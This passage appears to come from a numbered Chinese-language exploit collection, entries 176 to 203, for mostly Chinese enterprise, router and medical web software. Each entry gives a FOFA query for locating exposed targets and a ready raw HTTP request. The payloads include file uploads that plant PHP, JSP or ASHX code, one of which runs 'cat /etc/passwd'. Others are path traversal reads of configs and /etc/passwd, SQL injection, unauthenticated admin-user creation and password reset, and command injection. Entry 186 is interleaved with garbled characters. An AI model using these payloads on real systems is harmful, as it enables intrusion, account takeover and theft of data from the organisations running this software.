Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"

------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

5 a; F6 ?$ N6 P( I186. F-logic DataCube3 SQL注入; i2 U% {2 [4 G; F! e, G) I/ E9 T
CVE-2024-31750; j/ k3 N/ @$ @0 z# A
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统0 k J, ]3 V( e$ }- I; H
FOFA:title=="DataCube3"
! x" b6 {$ g! t7 C y6 W+ W' gPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
6 s) J# ]0 V* c$ F N! XHost: your-ip
$ \- G2 \5 ?5 _! d; X: o6 K' v% uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
) y' N; s, [, q) J1 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.85 |. E0 ?; w3 y' ?7 }+ e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: M! x* w7 y) x b; o E
Accept-Encoding: gzip, deflate. Q3 S/ C$ c- {( D
Connection: close
# o3 a& D! {+ P' M' w7 I1 MContent-Type: application/x-www-form-urlencoded
, ` a7 r2 S2 ?9 L1 ?3 \+ v6 }6 e0 S) L9 `1 w
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14501 i3 R8 W2 y; }! |5 B" Y7 A
7 b6 a9 ^4 \7 E( h9 k
8 V9 o+ q' A" v- n d5 O& V
187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
  public bool IsReusable
  { get { return true; } }
  public void ProcessRequest(HttpContext ctx)
  {
    ctx.Response.Write("test");
  }
}

193. 山石网科 云鉴 Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operation Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.
POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 Internet Access Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system assetsmanager_upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Run the PoC to obtain the CSRF token, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1
Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload the file and request it:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 Omni-media News Gathering and Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values in the following request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--